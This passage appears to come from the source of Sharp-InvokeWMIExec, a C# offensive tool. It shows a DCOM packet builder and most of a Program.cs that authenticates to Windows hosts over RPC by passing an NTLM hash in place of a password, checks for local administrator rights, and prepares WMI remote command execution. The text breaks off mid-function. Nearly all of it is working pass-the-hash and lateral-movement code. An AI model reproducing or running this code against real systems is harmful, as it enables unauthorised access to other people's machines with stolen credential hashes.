packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFFlags", new byte[] { 0x04, 0x00, 0x00, 0x00 }); 389 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFIID", new byte[] { 0xc0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 390 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCLSID", new byte[] { 0x3b, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }); 391 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFCBExtension", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 392 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoClientPtrClientContextOBJREFCUSTOMOBJREFSize", new byte[] { 0x30, 0x00, 0x00, 0x00 }); 393 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesActivationContextInfoUnusedBuffer", new byte[] { 0x01, 0x00, 0x01, 0x00, 0x63, 0x2c, 0x80, 0x2a, 0xa5, 0xd2, 0xaf, 0xdd, 0x4d, 0xc4, 0xbb, 0x37, 0x4d, 0x37, 0x76, 0xd7, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00 }); 394 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc }); 395 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoPrivateHeader", packet_private_header); 396 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoAuthenticationFlags", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 397 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 }); 398 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 399 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 400 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 }); 401 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 402 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoReserved2", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 403 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameMaxCount", packet_target_length); 404 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameOffset", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 405 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameActualCount", packet_target_length); 406 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesSecurityInfoServerInfoServerInfoNameString", packet_target_unicode); 407 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc }); 408 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoPrivateHeader", new byte[] { 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 409 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 410 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoProcessID", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 411 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoApartmentID", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 412 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesLocationInfoContextID", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 413 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoCommonHeader", new byte[] { 0x01, 0x10, 0x08, 0x00, 0xcc, 0xcc, 0xcc, 0xcc }); 414 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoPrivateHeader", new byte[] { 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 415 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoNULLPtr", new byte[] { 0x00, 0x00, 0x00, 0x00 }); 416 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrReferentID", new byte[] { 0x00, 0x00, 0x02, 0x00 }); 417 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestClientImpersonationLevel", new byte[] { 0x02, 0x00, 0x00, 0x00 }); 418 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestNumProtocolSequences", new byte[] { 0x01, 0x00 }); 419 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestUnknown", new byte[] { 0x00, 0x00 }); 420 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrReferentID", new byte[] { 0x04, 0x00, 0x02, 0x00 }); 421 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrMaxCount", new byte[] { 0x01, 0x00, 0x00, 0x00 }); 422 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoRemoteRequestPtrRemoteRequestProtocolSeqsArrayPtrProtocolSeq", new byte[] { 0x07, 0x00 }); 423 | packet_DCOMRemoteCreateInstance.Add("DCOMRemoteCreateInstance_IActPropertiesCUSTOMOBJREFIActPropertiesPropertiesScmRequestInfoUnusedBuffer", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); 424 | return packet_DCOMRemoteCreateInstance; 425 | } 426 | } 427 | } 428 | -------------------------------------------------------------------------------- /Sharp-InvokeWMIExec/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Net; 3 | using System.Threading; 4 | using System.Security.Cryptography; 5 | using System.Diagnostics; 6 | using System.Net.Sockets; 7 | using System.Collections.Specialized; 8 | using System.Linq; 9 | using System.Text; 10 | 11 | namespace Sharp_InvokeWMIExec 12 | { 13 | class Program 14 | { 15 | static void Main(string[] args) 16 | { 17 | ArgumentParserResult arguments = ArgParse.Parse(args); 18 | 19 | if (arguments.ParsedOk == false) 20 | { 21 | displayHelp("Error Parsing Arguments"); 22 | Environment.Exit(0); 23 | } 24 | 25 | //User Params 26 | string command = ""; 27 | string hash = ""; 28 | string username = ""; 29 | bool debugging = false; 30 | string domain = ""; 31 | string target = ""; 32 | bool show_help = false; 33 | bool AdminCheck = false; 34 | 35 | try 36 | { 37 | if (arguments.Arguments.ContainsKey("showhelp")) 38 | { 39 | displayHelp("Usage:"); 40 | Environment.Exit(0); 41 | } 42 | if (arguments.Arguments.ContainsKey("command")) 43 | { 44 | command = arguments.Arguments["command"]; 45 | } 46 | else 47 | { 48 | AdminCheck = true; 49 | } 50 | if (arguments.Arguments.ContainsKey("admincheck")) 51 | { 52 | AdminCheck = true; 53 | } 54 | if (arguments.Arguments.ContainsKey("hash")) 55 | { 56 | hash = arguments.Arguments["hash"]; 57 | } 58 | if (arguments.Arguments.ContainsKey("username")) 59 | { 60 | username = arguments.Arguments["username"]; 61 | } 62 | if (arguments.Arguments.ContainsKey("debugging")) 63 | { 64 | debugging = true; 65 | } 66 | if (arguments.Arguments.ContainsKey("domain")) 67 | { 68 | domain = arguments.Arguments["domain"]; 69 | } 70 | if (arguments.Arguments.ContainsKey("target")) 71 | { 72 | target = arguments.Arguments["target"]; 73 | } 74 | } 75 | catch 76 | { 77 | displayHelp("Error Parsing Arguments"); 78 | Environment.Exit(0); 79 | } 80 | 81 | string Target_Short = String.Empty; 82 | string processID = BitConverter.ToString(BitConverter.GetBytes(Process.GetCurrentProcess().Id)).Replace("-00-00", "").Replace("-", ""); 83 | string Auth_Hostname = Environment.MachineName; 84 | string Output_Username = String.Empty; 85 | string WMI_Random_Port_String = null; 86 | string Target_Long = String.Empty; 87 | string WMI_Client_Stage = String.Empty; 88 | string WMI_Data = String.Empty; 89 | string OXID = String.Empty; 90 | StringBuilder output = new StringBuilder(); 91 | int Request_Split_Stage = 0; 92 | int Request_Length = 0; 93 | int Sequence_Number_Counter = 0; 94 | int Request_Split_Index_Tracker = 0; 95 | int Request_Auth_Padding = 0; 96 | int OXID_Index = 0; 97 | int WMI_Random_Port_Int = 0; 98 | int Target_Process_ID = 0; 99 | bool success = false; 100 | IPAddress Target_Type = null; 101 | byte[] Assoc_Group = null; 102 | byte[] Object_UUID = null; 103 | byte[] IPID = null; 104 | byte[] WMI_Client_Send; 105 | byte[] Object_UUID2 = null; 106 | byte[] Sequence_Number = null; 107 | byte[] Request_Flags = null; 108 | byte[] Process_ID_Bytes = Utilities.ConvertStringToByteArray(processID); 109 | byte[] Request_Call_ID = null; 110 | byte[] Request_Opnum = null; 111 | byte[] Request_UUID = null; 112 | byte[] Request_Context_ID = null; 113 | byte[] Alter_Context_Call_ID = null; 114 | byte[] Alter_Context_Context_ID = null; 115 | byte[] Alter_Context_UUID = null; 116 | byte[] Hostname_Length = null; 117 | byte[] Stub_Data = null; 118 | byte[] WMI_Namespace_Length = null; 119 | byte[] WMI_Namespace_Unicode = null; 120 | byte[] IPID2 = null; 121 | 122 | if (show_help) 123 | { 124 | displayHelp(null); 125 | Environment.Exit(0); 126 | } 127 | 128 | if (string.IsNullOrEmpty(command)) 129 | { 130 | AdminCheck = true; 131 | } 132 | 133 | if (!string.IsNullOrEmpty(hash) && !string.IsNullOrEmpty(username)) 134 | { 135 | if (hash.Contains(":")) 136 | hash = hash.Split(':').Last(); 137 | } 138 | else 139 | { 140 | displayHelp("Missing Required Params"); 141 | Environment.Exit(0); 142 | } 143 | 144 | 145 | if (!string.IsNullOrEmpty(domain)) 146 | Output_Username = domain + '\\' + username; 147 | else 148 | Output_Username = username; 149 | 150 | if (target == "localhost") 151 | { 152 | target = "127.0.0.1"; 153 | Target_Long = "127.0.0.1"; 154 | } 155 | 156 | try 157 | { 158 | if (debugging) { output.AppendLine(String.Format("Connecting to: {0}", target)); } 159 | Target_Type = IPAddress.Parse(target); 160 | Target_Short = Target_Long = target; 161 | } 162 | catch 163 | { 164 | Target_Long = target; 165 | 166 | if (target.Contains(".")) 167 | { 168 | int Target_Short_index = target.IndexOf("."); 169 | Target_Short = target.Substring(0, Target_Short_index); 170 | } 171 | else 172 | { 173 | Target_Short = target; 174 | } 175 | } 176 | 177 | var WMI_Client = new TcpClient(); 178 | 179 | try 180 | { 181 | WMI_Client.Connect(target, 135); 182 | } 183 | catch 184 | { 185 | Console.WriteLine("No Response from: " + target); 186 | Environment.Exit(0); 187 | } 188 | 189 | if (WMI_Client.Connected) 190 | { 191 | if (debugging) { output.AppendLine(String.Format("Connected to: {0}", target)); } 192 | NetworkStream WMI_Client_Stream = WMI_Client.GetStream(); 193 | byte[] WMI_Client_Receive = new byte[2048]; 194 | byte[] RPC_UUID = new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a }; 195 | OrderedDictionary Packet_RPC = WMIExec.RPCBind(2, new byte[] { 0xd0, 0x16 }, new byte[] { 0x02 }, new byte[] { 0x00, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 }); 196 | Packet_RPC["RPCBind_FragLength"] = new byte[] { 0x74, 0x00 }; 197 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC)); 198 | Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, 0, 0, 0, new byte[] { 0x02, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x05, 0x00 }, null); 199 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC)); 200 | string WMI_HostName = BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 42, WMI_Client_Receive.Length)); 201 | byte[] WMI_Hostname_Bytes = Utilities.ConvertStringToByteArray(WMI_HostName.Substring(0, WMI_HostName.IndexOf("-00-00-00")).Replace("-00", "").Replace("-", "").Replace(" ", "")); 202 | WMI_Hostname_Bytes = Utilities.GetByteRange(WMI_Hostname_Bytes, 0, WMI_Hostname_Bytes.Length); 203 | WMI_HostName = Encoding.ASCII.GetString(WMI_Hostname_Bytes); 204 | if (Target_Short != WMI_HostName) 205 | { 206 | if (debugging) { output.AppendLine(String.Format("Switching target name to {0} due to initial response.", WMI_HostName)); } 207 | Target_Short = WMI_HostName; 208 | } 209 | WMI_Client.Close(); 210 | WMI_Client_Stream.Close(); 211 | WMI_Client = new TcpClient(); 212 | WMI_Client.ReceiveTimeout = 30000; 213 | 214 | try 215 | { 216 | WMI_Client.Connect(Target_Long, 135); 217 | } 218 | catch 219 | { 220 | output.AppendLine(String.Format("No response from {0}", target)); 221 | Console.WriteLine(output.ToString()); 222 | } 223 | 224 | if (WMI_Client.Connected) 225 | { 226 | if (debugging) { output.AppendLine(String.Format("ReConnected to: {0} ", target)); } 227 | if (debugging) { output.AppendLine("Authenticating"); } 228 | WMI_Client_Stream = WMI_Client.GetStream(); 229 | RPC_UUID = new byte[] { 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 }; 230 | Packet_RPC = WMIExec.RPCBind(3, new byte[] { 0xd0, 0x16 }, new byte[] { 0x01 }, new byte[] { 0x01, 0x00 }, RPC_UUID, new byte[] { 0x00, 0x00 }); 231 | Packet_RPC["RPCBind_FragLength"] = new byte[] { 0x78, 0x00 }; 232 | Packet_RPC["RPCBind_AuthLength"] = new byte[] { 0x28, 0x00 }; 233 | Packet_RPC["RPCBind_NegotiateFlags"] = new byte[] { 0x07, 0x82, 0x08, 0xa2 }; 234 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC)); 235 | string WMI_NTLMSSP = BitConverter.ToString(WMI_Client_Receive).Replace("-", ""); 236 | int WMI_NTLMSSP_index = WMI_NTLMSSP.IndexOf("4E544C4D53535000"); 237 | int WMI_NTLMSSP_bytes_index = WMI_NTLMSSP_index / 2; 238 | int WMI_Domain_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 12, WMI_Client_Receive); 239 | int WMI_target_Length = Utilities.DataLength(WMI_NTLMSSP_bytes_index + 40, WMI_Client_Receive); 240 | byte[] WMI_NTLM_Challenge = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 24, WMI_NTLMSSP_bytes_index + 31); 241 | byte[] WMI_Target_Details = Utilities.GetByteRange(WMI_Client_Receive, WMI_NTLMSSP_bytes_index + 56 + WMI_Domain_Length, WMI_NTLMSSP_bytes_index + 55 + WMI_Domain_Length + WMI_target_Length); 242 | byte[] WMI_Target_Time_Bytes = Utilities.GetByteRange(WMI_Target_Details, WMI_Target_Details.Length - 12, WMI_Target_Details.Length - 5); 243 | StringBuilder sb = new StringBuilder(); 244 | for (int i = 0; i < hash.Length - 1; i += 2) { sb.Append(hash.Substring(i, 2) + "-"); }; 245 | byte[] NTLM_hash_bytes = (Utilities.ConvertStringToByteArray(hash.Replace("-", ""))); 246 | byte[] Auth_Hostname_Bytes = Encoding.Unicode.GetBytes(Auth_Hostname); 247 | byte[] Auth_Domain_Bytes = Encoding.Unicode.GetBytes(domain); 248 | byte[] Auth_Username_Bytes = Encoding.Unicode.GetBytes(username); 249 | byte[] Auth_Domain_Length = BitConverter.GetBytes(Auth_Domain_Bytes.Length); 250 | Auth_Domain_Length = new byte[] { Auth_Domain_Length[0], Auth_Domain_Length[1] }; 251 | byte[] Auth_Username_Length = BitConverter.GetBytes(Auth_Username_Bytes.Length); 252 | Auth_Username_Length = new byte[] { Auth_Username_Length[0], Auth_Username_Length[1] }; 253 | byte[] Auth_Hostname_Length = BitConverter.GetBytes(Auth_Hostname_Bytes.Length); 254 | Auth_Hostname_Length = new byte[] { Auth_Hostname_Length[0], Auth_Hostname_Length[1] }; 255 | byte[] Auth_Domain_offset = new byte[] { 0x40, 0x00, 0x00, 0x00 }; 256 | byte[] Auth_Username_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + 64); 257 | byte[] Auth_Hostname_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + 64); 258 | byte[] Auth_LM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 64); 259 | byte[] Auth_NTLM_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + 88); 260 | HMACMD5 HMAC_MD5 = new HMACMD5(); 261 | HMAC_MD5.Key = NTLM_hash_bytes; 262 | string Username_And_Target = username.ToUpper(); 263 | byte[] Username_Bytes = Encoding.Unicode.GetBytes(Username_And_Target); 264 | byte[] Username_And_Target_bytes = Username_Bytes.Concat(Auth_Domain_Bytes).ToArray(); 265 | byte[] NTLMv2_hash = HMAC_MD5.ComputeHash(Username_And_Target_bytes); 266 | Random r = new Random(); 267 | byte[] Client_Challenge_Bytes = new byte[8]; 268 | r.NextBytes(Client_Challenge_Bytes); 269 | byte[] Security_Blob_Bytes = (new byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 270 | .Concat(WMI_Target_Time_Bytes) 271 | .Concat(Client_Challenge_Bytes) 272 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }) 273 | .Concat(WMI_Target_Details) 274 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }).ToArray(); 275 | 276 | byte[] Server_Challenge_And_Security_Blob_Bytes = WMI_NTLM_Challenge.Concat(Security_Blob_Bytes).ToArray(); 277 | HMAC_MD5.Key = NTLMv2_hash; 278 | byte[] NTLMv2_Response = HMAC_MD5.ComputeHash(Server_Challenge_And_Security_Blob_Bytes); 279 | byte[] Session_Base_Key = HMAC_MD5.ComputeHash(NTLMv2_Response); 280 | NTLMv2_Response = NTLMv2_Response.Concat(Security_Blob_Bytes).ToArray(); 281 | byte[] NTLMv2_Response_Length = BitConverter.GetBytes(NTLMv2_Response.Length); 282 | NTLMv2_Response_Length = new byte[] { NTLMv2_Response_Length[0], NTLMv2_Response_Length[1] }; 283 | byte[] WMI_Session_Key_Offset = BitConverter.GetBytes(Auth_Domain_Bytes.Length + Auth_Username_Bytes.Length + Auth_Hostname_Bytes.Length + NTLMv2_Response.Length + 88); 284 | byte[] WMI_Session_Key_Length = new byte[] { 0x00, 0x00 }; 285 | byte[] WMI_Negotiate_Flags = new byte[] { 0x15, 0x82, 0x88, 0xa2 }; 286 | 287 | byte[] NTLMSSP_response = (new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 0x00, 0x18, 0x00 }) 288 | .Concat(Auth_LM_Offset) 289 | .Concat(NTLMv2_Response_Length) 290 | .Concat(NTLMv2_Response_Length) 291 | .Concat(Auth_NTLM_Offset) 292 | .Concat(Auth_Domain_Length) 293 | .Concat(Auth_Domain_Length) 294 | .Concat(Auth_Domain_offset) 295 | .Concat(Auth_Username_Length) 296 | .Concat(Auth_Username_Length) 297 | .Concat(Auth_Username_Offset) 298 | .Concat(Auth_Hostname_Length) 299 | .Concat(Auth_Hostname_Length) 300 | .Concat(Auth_Hostname_Offset) 301 | .Concat(WMI_Session_Key_Length) 302 | .Concat(WMI_Session_Key_Length) 303 | .Concat(WMI_Session_Key_Offset) 304 | .Concat(WMI_Negotiate_Flags) 305 | .Concat(Auth_Domain_Bytes) 306 | .Concat(Auth_Username_Bytes) 307 | .Concat(Auth_Hostname_Bytes) 308 | .Concat(new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }) 309 | .Concat(NTLMv2_Response).ToArray(); 310 | 311 | Packet_RPC = WMIExec.RPCAuth3(NTLMSSP_response); 312 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC); 313 | WMI_Client_Stream.Write(WMI_Client_Send, 0, WMI_Client_Send.Length); 314 | WMI_Client_Stream.Flush(); 315 | byte[] Causality_ID_Bytes = new byte[16]; 316 | r.NextBytes(Causality_ID_Bytes); 317 | OrderedDictionary Packet_DCOM_Remote_Create_Instance = WMIExec.DCOMRemoteCreateInstance(Causality_ID_Bytes, Target_Short); 318 | byte[] DCOM_Remote_Create_Instance = Utilities.ConvertFromPacketOrderedDictionary(Packet_DCOM_Remote_Create_Instance); 319 | Packet_RPC = WMIExec.RPCRequest(new byte[] { 0x03 }, DCOM_Remote_Create_Instance.Length, 0, 0, new byte[] { 0x03, 0x00, 0x00, 0x00 }, new byte[] { 0x01, 0x00 }, new byte[] { 0x04, 0x00 }, null); 320 | WMI_Client_Send = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC).Concat(DCOM_Remote_Create_Instance).ToArray(); 321 | WMI_Client_Receive = Utilities.SendStream(WMI_Client_Stream, WMI_Client_Send); 322 | TcpClient WMI_Client_Random_Port = new TcpClient(); 323 | WMI_Client_Random_Port.Client.ReceiveTimeout = 30000; 324 | 325 | int OXID_Bytes_Index; 326 | if (WMI_Client_Receive[2] == 3 && BitConverter.ToString(Utilities.GetByteRange(WMI_Client_Receive, 24, 27)) == "05-00-00-00") 327 | { 328 | output.AppendLine("WMI Access Denied"); 329 | Console.WriteLine(output.ToString()); 330 | Environment.Exit(0); 331 | } 332 | else if (WMI_Client_Receive[2] == 3) 333 | { 334 | string Error_Code = BitConverter.ToString(new byte[] { WMI_Client_Receive[27], WMI_Client_Receive[26], WMI_Client_Receive[25], WMI_Client_Receive[24] }); 335 | string[] Error_Code_Array = Error_Code.Split('-'); 336 | Error_Code = string.Join("", Error_Code_Array); 337 | output.AppendLine(String.Format("Error Code: 0x{0}", Error_Code.ToString())); 338 | Console.WriteLine(output.ToString()); 339 | Environment.Exit(0); 340 | } 341 | else if (WMI_Client_Receive[2] == 2 && AdminCheck) 342 | { 343 | output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target_Long)); 344 | if (debugging) { output.AppendLine("Exiting due to AdminCheck being set"); } 345 | Console.WriteLine(output.ToString()); 346 | Environment.Exit(0); 347 | } 348 | else if (WMI_Client_Receive[2] == 2 && !AdminCheck) 349 | { 350 | if (debugging) { output.AppendLine("Continuing since AdminCheck is false"); } 351 | if (Target_Short == "127.0.0.1") 352 | { 353 | Target_Short = Auth_Hostname; 354 | } 355 | byte[] Target_Unicode = (new byte[] { 0x07, 0x00 }).Concat(Encoding.Unicode.GetBytes(Target_Short + "[")).ToArray(); 356 | string Target_Search = BitConverter.ToString(Target_Unicode).Replace("-", ""); 357 | string WMI_message = BitConverter.ToString(WMI_Client_Receive).Replace("-", ""); 358 | int Target_Index = WMI_message.IndexOf(Target_Search); 359 | 360 | if (Target_Index < 1) 361 | { 362 | IPAddress[] Target_Address_List = Dns.GetHostEntry(Target_Long).AddressList; 363 | foreach (IPAddress ip in Target_Address_List) 364 | { 365 | Target_Short = ip.Address.ToString(); 366 | Target_Search = BitConverter.ToString(Target_Unicode).Replace("-", ""); 367 | Target_Index = WMI_message.IndexOf(Target_Search); 368 | 369 | if (Target_Index >= 0) 370 | { 371 | break; 372 | } 373 | } 374 | } 375 | 376 | if (Target_Index > 0) 377 | { 378 | int Target_Bytes_Index = Target_Index / 2; 379 | byte[] WMI_Random_Port_Bytes = Utilities.GetByteRange(WMI_Client_Receive, Target_Bytes_Index + Target_Unicode.Length, Target_Bytes_Index + Target_Unicode.Length + 8); 380 | WMI_Random_Port_String = BitConverter.ToString(WMI_Random_Port_Bytes); 381 | int WMI_Random_Port_End_Index = WMI_Random_Port_String.IndexOf("-5D"); 382 | if (WMI_Random_Port_End_Index > 0) 383 | { 384 | WMI_Random_Port_String = WMI_Random_Port_String.Substring(0, WMI_Random_Port_End_Index); 385 | } 386 | WMI_Random_Port_String = WMI_Random_Port_String.Replace("-00", "").Replace("-", ""); 387 | char[] Random_Port_Char_Array = WMI_Random_Port_String.ToCharArray(); 388 | char[] chars = new char[] { Random_Port_Char_Array[1], Random_Port_Char_Array[3], Random_Port_Char_Array[5], Random_Port_Char_Array[7], Random_Port_Char_Array[9] }; 389 | WMI_Random_Port_Int = int.Parse(new string(chars)); 390 | string Reverse = BitConverter.ToString(WMI_Client_Receive).Replace("-", ""); 391 | int Reverse_Index = Reverse.IndexOf("4D454F570100000018AD09F36AD8D011A07500C04FB68820"); 392 | int Reverse_Bytes_Index = Reverse_Index / 2; 393 | byte[] OXID_bytes = Utilities.GetByteRange(WMI_Client_Receive, Reverse_Bytes_Index + 32, Reverse_Bytes_Index + 39); 394 | IPID = Utilities.GetByteRange(WMI_Client_Receive, Reverse_Bytes_Index + 48, Reverse_Bytes_Index + 63); 395 | OXID = BitConverter.ToString(OXID_bytes).Replace("-", ""); 396 | OXID_Index = Reverse.IndexOf(OXID, Reverse_Index + 100); 397 | OXID_Bytes_Index = OXID_Index / 2; 398 | Object_UUID = Utilities.GetByteRange(WMI_Client_Receive, OXID_Bytes_Index + 12, OXID_Bytes_Index + 27); 399 | } 400 | if (WMI_Random_Port_Int != 0) 401 | { 402 | try 403 | { 404 | WMI_Client_Random_Port.Connect(Target_Long, WMI_Random_Port_Int); 405 | } 406 | catch 407 | { 408 | output.AppendLine(String.Format("{0}:{1} did not respond", Target_Long, WMI_Random_Port_Int)); 409 | Console.WriteLine(output.ToString()); 410 | Environment.Exit(0); 411 | } 412 | } 413 | else 414 | { 415 